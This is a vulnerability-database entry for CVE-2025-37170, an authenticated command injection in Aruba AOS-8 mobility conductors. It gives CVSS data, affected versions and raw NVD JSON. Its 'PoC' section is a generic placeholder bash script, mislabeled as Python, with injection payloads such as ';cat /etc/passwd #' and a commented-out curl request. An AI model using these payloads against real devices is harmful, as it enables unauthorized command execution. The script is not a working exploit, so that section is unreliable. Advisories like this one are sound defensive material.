Security Vulnerability Report
中文
CVE-2025-37170 CVSS 7.2 HIGH

CVE-2025-37170

Published: 2026-01-13 20:16:05
Last Modified: 2026-01-23 16:46:10

Description

Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
Aruba Mobility Conductor (AOS-8) - All versions prior to security patches

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-37170 PoC - Aruba AOS-8 Command Injection # Author: Security Research # Note: This is a conceptual PoC for authorized security testing only TARGET="https://target-aruba-device.local" COOKIES="session_cookie_here" # Example command injection through web management interface # The actual vulnerable endpoint and parameter need to be identified through enumeration PAYLOAD=';cat /etc/passwd #' # Read system passwd file PAYLOAD=';id #' # Verify command execution context PAYLOAD=';uname -a #' # System information PAYLOAD=';whoami #' # Current user context # Example HTTP request structure (requires valid authentication) echo "[*] Sending malicious request to target..." echo "[*] Payload: $PAYLOAD" # Note: Replace with actual vulnerable endpoint discovered through testing # curl -k -X POST "$TARGET/v1/api/endpoint" \ # -H "Cookie: $COOKIES" \ # -d "param=value$PAYLOAD" echo "[!] This PoC requires valid high-privilege credentials" echo "[!] Use only in authorized penetration testing scenarios"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37170", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:04.963", "lastModified": "2026-01-23T16:46:09.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system."}, {"lang": "es", "value": "Existen vulnerabilidades de inyección de comandos autenticadas en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan el sistema operativo AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado ejecutar comandos arbitrarios como un usuario privilegiado en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "28EE6221-D715-48C4-B181-BD530080E706"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}